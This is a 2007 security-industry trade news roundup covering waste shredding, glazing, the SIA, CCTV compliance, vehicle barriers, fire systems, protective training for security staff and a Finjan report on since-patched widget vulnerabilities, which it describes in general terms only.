 |
|
Security Features - October
2007
Tim
Thomas, BSIA Director of Legal Services comments:
“From the 30th Oct 2007, businesses are obliged to minimise
the amount of waste that they send to landfill in order to meet
the new requirements of the Landfill Directive. As a result, the
British Security Industry Association (BSIA) is advising businesses
to review their waste management processes and undertake alternative
methods of disposal such as recycling.”
“Businesses should ensure that their confidential waste
is being disposed of securely and the BSIA’s Security Waste
Audit is a useful tool in aiding businesses to assess this level
of security. In order for businesses to protect themselves against
becoming victims of identity fraud, the Association advises engaging
the services of a BSIA Information Destruction company which will
not only shred your confidential waste, but will also ensure that
any waste that can be is recycled. This means that businesses
can protect themselves from identity theft, fulfil their requirements
under the Data Protection Act, and also comply with the new Landfill
regulations.”
“All BSIA information destruction section members must hold
ISO 9001:2000 accreditation and will be inspected to BS 8470,
the British Standard for the destruction of confidential material,
as part of their ISO accreditation audit procedure. This provides
customers with further peace of mind that their confidential information
is in safe hands and that their legal obligations are fulfilled.”
Selectaglze
enhance window security
Windows have traditionally been seen as “soft targets”
for physical attack and points of entry for intruders and have
provided little protection against bomb blast. Flying glass can
be a major cause of injury to those in buildings that suffer a
bomb blast. Where lives are potentially at stake or the need to
protect property is critical products must be fully tested and
certified.
Based on their market leading secondary glazing systems Royal
Warrant Holder, Selectaglaze, has developed a Security Range which
has successfully passed tests for physical resistance, bomb protection,
ballistic protection and 30 minute fire integrity. The units have
been tested to BS7590, meeting the needs of the “Secured
by Design” initiative.
Secondary glazing involves the installation of “discrete”
purpose-made windows fitted room-side of the primary window and
is appropriate for staged refurbishment or upgrade plans, with
little disruption to the building or its occupants.
Selectaglaze’s “Window Protection Systems” brochure
contains comprehensive information on all of the company’s
security systems, together with guidance on appropriate levels
of protection for various risk situations and details of the test
standards and certifying bodies. The brochure is available free,
upon request. enquires@selectaglaze.co.uk
or phone 01727 837271/fax: 01727 844053.
www.selectaglaze.co.uk
Success
of Approved Contractor Scheme Leads to Reduction in Fees
The Security Industry Authority (SIA) is pleased to announce a
£3 per head reduction in the annual Approved Contractor
Scheme (ACS) registration fee for each licensable employee –
from £20 to £17. The reduction takes effect from 1
October 2007.*
The ACS is a non-profit making scheme with the fees set at a break-even
level. Since the launch of the ACS it has proved so popular with
security companies that there are now more Approved Contractors,
employing more licensable staff, than initially projected. This
means the SIA can reduce the annual licensable employee fees by
£3 per head.
Andrew Shephard, SIA Assistant Director, ACS said:
“This is good news for Approved Contractors and helpful
to those companies considering applying to the scheme.
“The Approved Contractor Scheme has been a great success
with more companies than originally forecast seeking and achieving
ACS status. As of today, 378 security companies are approved,
employing more than 90,000 licensable staff - which is approaching
half of the licensable security population in England and Wales.
“ACS fees will be reviewed every year and adjusted again,
if necessary, to ensure that fee income continues to match the
costs of the scheme.”
New
SIA Chief Executive
Michael Wilson joins the Security Industry Authority (SIA) as
Chief Executive. He takes over from Andy Drane who was Acting
Chief Executive.
Before joining the SIA, Mike was Chief Executive of the Gangmasters
Licensing Authority, and before that was Chief Executive of the
Defence Vetting Agency.
Speaking about his new role Mike said:
“I am joining an organisation that has an important role
to play in protecting the public by regulating the private security
industry.
“The SIA has accomplished a great deal in a relatively short
period of time. It worked closely with Government and with the
private security industry to draw up a range of security standards.
And today, over 230,000 individuals hold valid SIA licences, more
than 368,000 SIA specified qualifications have been awarded and
378 security companies are Approved Contractors. This is an impressive
achievement that reflects well on the quality and commitment of
all staff.
“I look forward to working with the Directors and staff
of the Authority, the SIA Board, with the private security industry
and with other stakeholders, to build on the SIA’s achievements
to date. I am particularly interested in improving our service
to customers, to ensuring that we minimise any regulatory burden
on the industry, and in showing that the Authority is achieving
the outcomes envisaged in the Private Security Industry Act 2001.”
Mike Wilson was educated at the Duke of York’s School, Nairobi,
Mons Officer Cadet School, the Royal School of Military Engineering
and University College London. Married with three children, his
recreational interests include working dogs, shooting, climbing,
fishing, golf and deer management.
Increased
Demand for Security Services in Scotland
Edinburgh based defence and security consultants Stuart Crawford
Associates (SCA) report a surge in demand for their strategic
security risk assessment service in Scotland since the terrorist
attack on Glasgow airport in July this year. The attempt to blow
up the departures lounge at the start of the holiday season, dramatically
captured on video by many holiday makers and shown widely in national
television, has prompted individuals, companies and other organisations
to take a long, hard look at their security arrangements, both
of property and personnel. Increased numbers are not happy with
what they have found and are seeking expert help.
SCA founder Stuart Crawford is not surprised. “Over the
years Scotland has been very fortunate in that it has never suffered
the levels of terrorist related violence which other parts of
the UK have endured. In fact, many people were saying that it
would never happen up here. In contrast, the longer nothing major
happened in Scotland the more likely we at SCA thought it would
happen in the future. Now that the Glasgow attack has taken place,
we can be sure that, sadly, there will be more of the same at
some point.”
He went on: “This has woken a lot of people up out of their
slumbers and they’re having a look at what they have in
place in terms of security arrangements for personnel and property.
A lot are not liking what they’re finding and are coming
to people like us to give them advice and guidance. We are one
of the few, if not the only, credible Scottish based security
consultancy of our type, and for Scottish organisations (and those
in the north of England) we’re relatively inexpensive to
hire as we don’t have the overheads or the travel and accommodation
expenses of our London based rivals.”
SCA operates at what they call the “intellectual end”
of the security sector, using their many combined years of military
training and expertise to advise clients from all sectors on their
security. Much use is made of ex special forces personnel who
are particularly well qualified in this sort of work and are in
essence “poachers turned gamekeepers”.
Further details of SCA’s services can be obtained at their
website at www.swcrawford.co.uk
.
SIA
and police praise security staff at ‘V’ Festival
A team of investigators from the Security Industry Authority (SIA)
visited the ‘V’ Festival at Hylands Park, Chelmsford
to carry out a number of compliance checks on security operatives
deployed at the event.
The SIA was fully supported by Essex Police, Chelmsford Borough
Council and security providers. Investigators had permission to
enter the site and undertake relevant checks from event organiser
Maztec Ltd.
The team inspected licences and spoke to over 120 individuals
across 24 locations; they found security staff were 100% compliant
with the law.
David Porter, an SIA Head of Investigation said: “I am very
pleased with the results of the operation. Those requiring SIA
licences were wearing them and were professional whilst undertaking
their duties.
Bell
Security Ltd - ‘Fire UK’ Division Gains LPS 1014 Certification
Fire UK, the fire systems division of Bell Security Ltd, has attained
LPS 1014-certified status. Bell regards this important third-party
recognition of the quality of its installations - from the certifying
audit group BRE, for the LPCB (Loss Prevention Certification Board)
- as the attainment of a further goal in a strategy to help expand
its portfolio of major customers nationwide. Fire UK already holds
BAFE/NSI Fire Gold accreditation and in recent months has made
project wins in the academic, commercial and industrial sectors.
Bell Security - Fire UK Business Support Manager, Lee Merryweather,
said:
"Adding LPS 1014, and therefore now holding dual, third-party
certification of our operations, is a major credibility enhancement
for us in the marketplace. In the light of the 2006 fire safety
legislation, the customer confidence this provides will be a key
business driver."
Lee Merryweather (left) is pictured receiving the company's certification
from LPS 1014 Scheme Manager, Robert Denton.
Visit: www.bellsecurity.co.uk
For further information: Bell Security Ltd Tim Harris tim.harris@bellsecurity.co.uk
Tel: 020 8553 5932
CCTV
– Compliance Assistance
The National Security Inspectorate (NSI) advises that all CCTV
systems, with the exception of those used to record images on
private dwellings, must comply with the 1998 Data Protection Act.
Compliance is mandatory and organisations that do not comply risk
penalty fines.
Before a CCTV surveillance system is installed, the purpose of
its intended use needs to be established and the person(s) or
organisation responsible for the system needs to be documented
and registered with the Office of the Data Protection Commissioner.
To comply with the Data Protection Act, consideration must also
be given to the sitting of cameras, ensuring that they only cover
the areas that require monitoring. The owners of the system must
consult with the owners of any private dwellings that may be covered
or border the area that is being monitored by the equipment. Owners
of the system must not adjust the cameras to cover any areas not
covered by the scheme and the privacy of individuals must be respected
at all times.
Signs must be placed within the area that is monitored in order
to notify the public that they are entering a site that is under
CCTV surveillance. These signs must be clearly visible and legible
and include details of who is responsible for the CCTV system.
Once a system has been purchased and installed it is necessary
to ensure that the CCTV images recorded are of a high quality,
so that they are not rendered useless. Frequent checks must be
made to ensure that the equipment is performing properly - checking
that there is enough light for the camera to give a clear picture,
ensuring that the recording media is of good quality (where tapes
are still used they must be changed regularly) and images are
kept for a month at the least. However, images must not be retained
for longer than necessary in order to protect the rights of those
being filmed.
Finally, it is necessary to maintain that only authorised employees
have access to the recorded information and it is these employees
who carry responsibility for deciding if these images should be
viewed by a third party. Access to CCTV recorded images needs
to be tightly controlled and restricted to comply with the Data
Protection Act and third parties must be limited to the police,
legal representatives and people whose image has been recorded,
unless under they are investigation.
In order to ensure that your CCTV system is complaint, customers
should always use only those companies approved through officially
recognised third party certification (TPC) bodies.
Paxton
Access launches range of ‘designer’ access control
readers
Paxton Access, the UK market leader in the design and manufacture
of electronic access control systems has announced the launch
of a new and unique range of internal PROXIMITY Architectural
readers. “Our unique range of new access control readers
is in direct response to requests from architects and designers
for manufacturers to be more imaginative in the design of access
control systems”, says Adam Stroud, Paxton Access Sales
and Marketing Director. “We are anticipating strong demand
from corporate customers for whom design and style is an important
aspect of their built environment.”
A PROXIMITY access control reader is the wall-mounted unit to
which the user presents their proximity token, for instance in
order to unlock a door or raise a barrier. Depending on the technology
in use, this may require the user to present a token to the reader
or simply to have the token carried on their person.
Until now access control readers have been uniform in design,
varying little in shape or size, and offering almost no opportunity
for the customer to exercise choice.
“Our new range of Proximity readers provides architects,
designers and their customers the opportunity to exercise both
choice and control over how their readers look”, explains
Adam Stroud.
Designed to fit discreetly and stylishly into installations where
aesthetics are paramount, the PROXIMITY architectural reader is
manufactured using high quality materials and incorporates three
high intensity LEDs, which show green for access, red for access
denied and white when in standby mode.
The reader consists of two main parts, the reader and the insert.
The initial range comprises three different bezel finishes - brush
chrome, matt black and satin chrome – available with a choice
of three inserts - wood, stone or glass. Furthermore, a template
is available for customers who wish to provide their own insert,
for instance to match precisely an existing wall finish. This
gives limitless possibilities and provides the possibility of
a reader that is truly sympathetic with its environment.
The architectural reader is designed to be partially sunken into
the wall and is fitted using a supplied, bespoke backbox. The
reader is suitable for use with Paxton Access’ Switch2 and
Net2 systems.
More information is available online at www.paxton.co.uk
or by telephoning 0845 838 1716.
Downlight
Clever
Recently introduced to ESP’s D-range of CCTV products is
the innovative Down Light Camera (DLC) – designed to resemble
a recessed downlight while providing discreet day and night surveillance.
Available in a range of finishes (brass, white, chrome, gun metal)
to complement real downlights in the space, the DLC provide colour
images during the day and mono images at night, using its integral
infra-red illumination. In-built angle-adjustment allows the surveillance
area to be precisely defined.
The DLC is a 12vdc camera with standard BNC connections compatible
with all CCTV monitoring systems including of course the ESP D-range
and features a 1/3” Sony HAD CCD image sensor for enhanced
image quality.
Terra
Lock gate; A Bi-Parting hinged gate
Frontier Pitts new Terra Lock gate has been successfully crash
tested to the BSI standard PAS 68 2007, the Terra Laock gate stopped
7,500kg travelling at 80km/Hour.
The new high security bi parting hinged gate, was successfully
tested by TRL Crash Laboratories.
The Terra Lock Gate remained fully functional after the crash
test.
The test was conducted to prove the arresting capability of the
Terra Lock Gate when impacted with a 7500kg test vehicle at a
speed of 80km/hour (50mph). In accordance with BSI PAS:68 2007
specification, which exceeds the Department of State K12 test
standard, the test vehicle was fitted with test sensors, to meet
the demanding standard specifications.
The new Terra Lock Gate is part of the Anti-Terra Series. Other
products in the range include the Terra Blocker, the Terra Bollards,
Terra Gate, Terra Road Closer (swing arm) and the Terra Barrier
(rising arm) which have all been successfully crash tested by
TRL.
On impact the Terra Lock Gate brought the vehicle to a complete
halt, with zero penetration onto site or past the gate leaves.
The cab of the truck was totally crushed. A key feature of the
design ensured that all forward energy was absorbed at the front
of the equipment and into the shallow foundations on impact.
Immediately after the crash, the Terra Lock Gate’s leaves
continued to opened and closed as normal immediately following
impact. No other company in the World can offer a product which
can surpass the standards for BSI PAS 68 2007, and continue to
operate immediately after the impact, especially without needing
repair. This is a major breakthrough in high security, anti-terrorist
barricades, which was witnessed by CPNI (Centre for the Protection
of National Infrastructure), formerly NSAC (National Security
Advice Centre) plus NICC; the UK Governments Advisory Body for
Security.
Frontier Pitts have developed the Terra Lock Gate to meet the
requirements of our customers at Airports, Embassies, Palaces,
Government Institutions and Military Bases around the World. Key
features of the Frontier Pitts crash-rated Terra Lock Gate include
shallow foundation requirements of only 300mm, allowing installation
of the gate even on sites where underground services exist. The
Terra Lock Gate is also easily automated using powerful actuators
from Frontier Pitts extensive range.
The Frontier Pitts crash-rated Terra Lock Gate is available in
widths of up to 6000mm and height of 3000mm, with foundation depth
of only 300mm required. Further details are available at www.frontierpitts.com
or by telephoning +44 (0) 1293 422800.
New
RCP 6B Radio Fire System
a Wire-Free alternative to Conventional Panels from detectomat
The New Wire-Free, Radio Fire System from detectomat is a unique
alternative to the costs, potential damage and business disruption
associated with installing Fire Systems in existing buildings.
And an ideal solution for retrofit and refurbishment applications
in small to medium sized enterprises.
Interconnection of the various Fire System components including
detectors, manual call points, sounders and control panels, which
has traditionally been done in electrical cabling can now be done
with wire-free radio. Installing cables in existing buildings
has, in the past, meant ugly surface wiring or damage to decorations
caused by the installation of concealed wiring. Installing concealed
wiring is also time consuming and presents access issues and general
disruption to ongoing business. This all meant an unwanted and
unnecessary escalatation of costs, which can now be avoided!.
Radio as a Fire System communication medium has been available
for many years but at a high cost. Now, the unique RCP 6B system
from detectomat offers a cost-effective wire-free, Radio Fire
Alarm solution as an alternative to hardwired Conventional and
smaller Addressable applications. And as an added benefit the
system utilises detectomat's unique range of Designer cover Smoke
Alarms to complement traditional or modern contemporary interior
designs.
The system comprises of a range of battery operated, self-contained
fire detection and alarm devices including Heat and third party
certified Smoke Alarms plus Manual Call Points, Sounder Beacons
and other fire peripherials. These devices are radio connected
with each other via a Fire Panel base station, which provides
comprehensive alarm indication and control including monitoring
of the system network integrity and battery conditions.
A unique solution within its application area, which has been
reviewed and well received by a number of Fire Service and Fire
industry professionals. For further information call 01579 321750,
email detectomat@leighandersonassociates.com
or visit www.detectomat.com.
Recognising
Excellence
Driving up skills across the UK economy has never been more important
as can be seen by the Government’s multi-million pound add
campaign “Our Future. In Our Hands”. At the heart
of most skills development are the many highly innovative training
professionals dedicated to making a difference. In recognition
of their work, Skills for Security will be holding 3 awards ceremonies
in 2007.
The Annual Awards for England & Wales will be presented at
our conference on 8th November at Kassam Stadium.
The first Annual Awards for Northern Ireland will be presented
at our second conference on 14th November at the Waterfront Hall,
Belfast.
The Annual Awards for Scotland will be presented at our final
conference on 30th November at the Barony Hall in Glasgow.
The judges will be looking for best example case studies that
demonstrate the benefits of a commitment to raising the skills
and professionalism of people in the Security Business Sector
through training and development.
Award Categories
Dedication to Continuing Professional Development
Outstanding Coaching/Mentoring Practice
Most Innovative Training Aid/Product
Outstanding Skills Development Partnership
Best Training Professional
Entries are now closed however for further information visit the
Skills for Security website: www.skillsforsecurity.org.uk
Protecting
our People
by Stefan Hay FsyI
With the attention of many firmly focused on the ongoing risk
of terrorism, which remains current due the recent terrorist attacks
in London and Glasgow and the high profile arrest of the German
based terrorist cell planning attacks on Frankfurt airport, other
risks to business and more importantly the security operatives
that protect them, such as the rise in the use of prohibited weapons
during incidents of crime, are often neglected. It is, however,
a well known fact that in recent times there has been a sharp
increase in the frequency and seriousness of physical and violent
attacks on both security operatives and police officers across
the UK.
Violent weapon related attacks and other serious related crimes
against the person, occur at random and are unpredictable, making
it difficult for many businesses to protect their employees against
all risks, but if employees, (and in some cases their families),
feel vulnerable they will not be effective and the business itself
could become compromised.
The fatal wounding of British police officers and security operatives,
the vast majority of whom are unarmed, remain statistically rare,
but some of these recent cases serve as a reminder of the growing
danger of both jobs. PC Jonathan Henry, killed in Luton, was stabbed
as he responded to a call in the town centre. West Mercia Police,
our local force covering Worcester, also lost one of their own
when PC Richard Gray was shot dead on 6th May while responding
to a domestic incident in Shrewsbury.
In June 2007 a number of CVIT operatives were attacked with knives
during robberies across Derbyshire and 24 yr old commuter Adam
Mapleson was shot in the chest when he came to the aid of a security
officer during an armed robbery in Essex in May.
In March, a student, employed as a security officer at Loughborough
University, was shot three times in the abdomen at an event organised
by the student’s union.
In Dec 2006 Norwich security officer Paul Cavanagh, working in
HMV, was stabbed to death by a 19 year old man and his colleague,
Gavin Levett, working at Boots, and Special PC Ian Gardner were
injured during the same attack in Norwich.
In March 2006 two security guards at the NEC were shot during
a concert. One was shot three time sustaining injuries to the
face, stomach and foot.
Certainly many more security operatives have been wounded, some
fatally, as a result of the fact that the criminals they encounter
do not hesitate to use the weapons they carry and it is these
deaths and injuries that have, in our opinion, made improved conflict
management and physical intervention skills training, greater
weapons awareness for employees and body armour distribution to
security personnel essential.
It is also worth noting that, with the implementation of the Health
& Safety at Work Act, employers neglect at their peril their
‘duty of care to provide employees protection from harm
in the workplace’ and this includes all employers in the
Security Business Sector. Employers have, therefore, the duty
of ensuring that their employees and dependents feel and stay,
safe and we are continuing to develop a range of appropriate solutions
to help employers provide such peace of mind to their people.
We are pleased to work with a network of specialist training providers
to support key skills development areas. Firstly, we continue
to run the hugely successful Weapons Awareness and Recognition
Training courses in partnership with PS5. We are also currently
compiling a list of people interested in attending the Lorica
Research ‘Body Armour Experience’ course which we
believe will become another essential course in the network portfolio
as, according to scientist and leading body armour developer Digby
Dyke of Lorica, “there is greater risk for the Private Security
Industry of buying, or being issued with, unsuitable or even dangerously
inadequate body armour offering little or no protection at all.
The police service in the UK generally is safer because the Home
Office provides standards for UK police body armour. While not
bound to purchase Home Office approved and qualified body armour,
police services in the UK do bind themselves voluntarily to do
so. It could be very dangerous for them to do otherwise.”
There are no formal standards for body armour for the PSI, nor
yet a specifically relevant watchdog and one of the consequences
for this is that there are vendors of body armour making exaggerated,
if not knowingly false, claims. According to Digby Dyke: “The
worst case we recently came across was one where body armour vests
were packed with carpet material! In another case, I saw an advertisement
on eBay for “the latest technology body armour vest, as
issued to HMF in Afghanistan”. Its protection capability
was described as “bullet proof and stab proof and will defeat
rifle fire”. I bought it for £40 and found it to be
a ‘fragmentation’ vest as issued to HMF not capable
of much more than defending against fragments from grenades and
mortars. It failed every ballistic and stab test that we, subjected
it to. I wrote to the vendor telling him who I was and he hastily
returned my £40 with a profuse apology and the explanation
that the wrong vest was sent!” It really is a question of
caveat emptor.
Finally, we have recently teamed up with leading conflict management
training specialist Maybo, under the SAFERwork banner, to provide
a high quality, legally and medically reviewed, Physical Intervention
Trainers Programme. This will enable trainers to deliver the Skills
for Security preferred physical intervention course for employees
in the Security Business Sector. Physical Intervention, however,
will not always be appropriate or safe and SAFERwork also covers
when not to intervene.
As a Skills and Standards Setting Body, we spend a great deal
of time operating at strategic level to support skills development
in the sector developing, for example, all of the National Occupational
Standards and conducting key research projects, but we are also
delighted to have so many key training partners such as PS5, Maybo
and Lorica Research who are delivering practical solutions to
protect those people, who, in return, serve and protect us all.
Finjan
reveals new attacks that exploit Widgets and Gadgets are imminent
Web Security Trends Report (Q3 2007) Continues Finjan’s
Tradition of Delivering ‘You-Heard-It-Here-First’
Information on Web Security
Finjan Inc., a leader in secure web gateway products, has announced
that seemingly innocent Widgets (or Gadgets) are exposing computer
users to a whole host of attacks. The findings are one of a number
uncovered by Finjan’s Malicious Code Research Center (MCRC)
and reported in the Web Security Trends Report (Q3 2007) which
reveals that the cool add-ons that add functions to websites contain
code that is vulnerable to exploits by hackers and criminals.
Finjan has found that widgets are vulnerable to a breadth of attacks
and can be used to endanger a user’s PC as part of an attacker’s
weapon arsenal. Finjan’s research also suggests that new
attacks that exploit the insecurities of widgets and gadgets are
imminent, and that a revised security model should be explored
in order to keep users protected from such attacks. All types
of widget environments (OS, 3rd party applications, and web widgets)
were found to be plagued with inadequate security models that
allowed malicious widgets to run. In addition, Finjan have found
vulnerable widgets that were already available (some in the default
installation) in the widget environment. These findings have already
prompted Microsoft and Yahoo to issue security advisories and
patches and an overhaul of the security models currently used
to host these widgets and gadgets online as well as in operating
systems that provide them.
“As Widgets become common in most modern computing environments
– from operating system to web portals, their significance
from a security standpoint rises.” According to Finjan CTO
Yuval Ben-Itzhak, “Vulnerabilities in widgets and gadgets
enable attackers to gain control of user machines, and thus should
be developed with security in mind. This attack vector could have
a major impact on the industry, immediately exposing corporations
to a vast array of new security considerations that need to be
dealt with. Organizations require security solutions capable of
coping with such a changing environment with the ability to analyze
code in real time, and detect malicious code appearing in innovative
attack vectors to provide adequate protection.”
Since major portals such as iGoogle, Live.com and Yahoo! all offer
personalized portals that utilize widgets, the growing popularity
of these cool add-ons is likely to result in their increased use
as an attack vector. Adequate protection from this new attack
vector is dependent upon a major overhaul of the security model
of these environments by the vendors. In the meantime, users are
advised to adhere to the following best practices:
Tips on what you should do to avoid Widget infections
a. Refrain from using non-trusted 3rd party widgets. Widgets and
gadgets should be treated as full blown applications and the use
of unknown and untrusted widgets is highly discouraged.
b. Use caution when using interactive widgets. Widgets that rely
on external feeds such as RSS, weather information, external application
data, etc., may be susceptible to attacks that exploit this trust
by piggybacking a malicious payload on such data.
c. Organizations should enforce a strict policy for their users
on using widgets and widget engines. Since these are not considered
business critical applications, or even productivity enhancers
in some cases, the use of widgets and gadgets by corporate users
should be limited. Additionally, blocking widget and gadget file
types could be enforced at the gateway in order to prevent the
downloading of such mini-applications to the corporate network.
To give an idea of the number of widgets and gadgets available
there are 3720 available on google.com , 3197 on apple.com and
3959 on Facebook.com, many of these applications are already being
used by millions of people based on information on iGoogle.
All the vulnerabilities described below have been fixed by the
corresponding vendors after being discreetly notified by Finjan.
Windows Vista Contacts Widget Vulnerability The Windows Vista
operating system comes pre-installed with the “Vista Sidebar”
as a basic component (for all flavours of the OS). The Sidebar
contains a few existing widgets that can be used out-of-the-box.
One of these widgets is the Contacts widget, that enables easy
access to contacts stored in the Windows Contacts application
(native component of Vista). Finjan researchers discovered a vulnerability
in the contacts widget, which enables an attacker to run arbitrary
code on the attacked machine by providing a malformed (albeit
fully usable and with a completely innocent appearance) contact
detail object. This contact, simply by being displayed in the
Contacts Widget, would run arbitrary code on the local machine
without any user interaction or verification.
Live.com RSS reader vulnerability Live.com is the new and improved
portal from Microsoft it enables the user to have a personalized
environment which can be customized to display recent headlines
(RSS feed), brief summary of hotmail inbox, local weather forecast,
etc. The Live.com RSS reader widget contained a vulnerability
that allowed an attacker to access privileged information from
the user account, while impersonating the user and taking control
of its browser. The vulnerability resulted from unsanitized data
feeds that could contain scripting commands in the items provided
by the RSS.
Yahoo! Widgets Contacts vulnerability Yahoo! provides a widget
engine that can be installed as a 3rd party application and provide
widget functionality for operating systems that do not support
this functionality natively. The Contacts widget in the Yahoo!
widgets engine contained a vulnerability that allowed an attacker
to run arbitrary code if a contact contained unsanitized scripting
commands.
The Web Security Trends Report (Q3 2007) also explores new developments
in financially-focused crimeware with detailed coverage of an
actual Trojan that meticulously and evasively targets financial
institutions in order to gain access to user accounts and perform
financial fraud. In addition, the report sounds the alarm on the
proliferation of crimeware toolkits as the leading attack vector
on the web - elaborating on the predictions about crimeware toolkits
in Finjan’s previous Q2 Report.
“Our latest quarterly Web Security Trends Report continues
our ongoing efforts of delivering you-heard-it-here-first information
regarding emerging trends in the web security industry,”
said Finjan CTO Yuval Ben-Itzhak. “We are pleased to share
MCRC’s important findings during 3Q 2007 with the greater
IT community, including real-world examples of malicious code
and suggestions as to how businesses and other organizations can
protect themselves from the latest web threats.”
New Developments in Financially-Focused Crimeware
The Finjan report also discusses the prevalence of web attacks
employing highly sophisticated Trojan, keylogger, and rootkit
crimeware that targets financial institutions. “Financial
gain is the driving force behind the explosive growth of cybercrime,”
said Ben-Itzhak. “Increasingly, crimeware has a single goal
-- to turn data into money. Crimeware is used to steal valuable
business data that can be monetized in the burgeoning cybercrime
market. Hackers are focusing their efforts on stealing sensitive
corporate, customer, financial and employee data, which can then
be sold online to criminal elements.”
|
|
